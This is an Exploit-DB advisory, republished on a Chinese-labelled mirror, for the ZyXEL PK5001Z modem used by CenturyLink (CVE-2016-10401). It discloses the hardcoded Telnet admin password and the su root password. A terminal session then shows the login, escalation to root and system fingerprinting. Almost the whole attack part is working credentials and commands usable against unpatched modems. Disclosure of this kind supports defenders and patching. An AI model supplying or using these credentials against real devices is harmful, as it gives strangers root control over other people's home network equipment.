ZyXEL PK5001Z Modem – Backdoor Account

  • 作者: Matthew Sheimo
    日期: 2017-10-31
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43105/
  • # Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password.
    # Google Dork: n/a
    # Date: 2017-10-31
    # Exploit Author: Matthew Sheimo
    # Vendor Homepage: https://www.zyxel.com/
    # Software Link: n/a
    # Version: PK5001Z 2.6.20.19
    # Tested on: Linux
    # About: ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world. 
    # Linked CVE's: CVE-2016-10401
     
     
    Hardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet
     
    username: admin
    password: CenturyL1nk
     
    Escalate to root with 'su' and this password.
    
    password: zyad5001
    
    
    [root:/]# telnet 192.168.0.1
    Trying 192.168.0.1...
    Connected to 192.168.0.1.
    Escape character is '^]'.
    
    PK5001Z login: admin
    Password: CenturyL1nk
    $ whoami
    admin_404A03Tel
    $ su
    Password: zyad5001
    # whoami
    root
    # uname -a
    Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown
    # cat /etc/zyfwinfo
    Vendor Name:ZyXEL Communications Corp.